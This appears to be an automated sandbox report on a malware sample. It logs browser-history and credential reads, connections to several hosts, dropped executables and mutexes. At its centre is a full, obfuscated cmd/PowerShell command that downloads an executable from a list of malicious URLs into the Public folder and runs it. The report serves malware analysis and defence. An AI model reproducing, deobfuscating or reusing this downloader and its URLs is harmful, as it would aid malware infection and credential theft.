Read data related to browsing history

Read the browsing history for "Microsoft Internet Explorer".

Read browser data

Possibly trying to readout browser credentials.

Download data

URL "www.indpts.com/UHSD/".

URL "173.201.20.6".

URL "159.203.94.198".

Perform DNS request

Resolve host name "www.indpts.com".

Connect to remote host

Outgoing TCP connection to host "108.163.227.35:80".

Connect to HTTP server

URL "173.201.20.6".

URL "159.203.94.198".

URL "www.indpts.com/UHSD/".

Create process

Create process "CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ".

Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".

Create process "C:\Users\Public\3292.exe".

Create process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe".

Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"".

Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"".

Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"".

Create system object

Create mutex with name "Global\.net clr networking".

Create mutex with name "Global\I705BA84C".

Create mutex with name "Global\M705BA84C".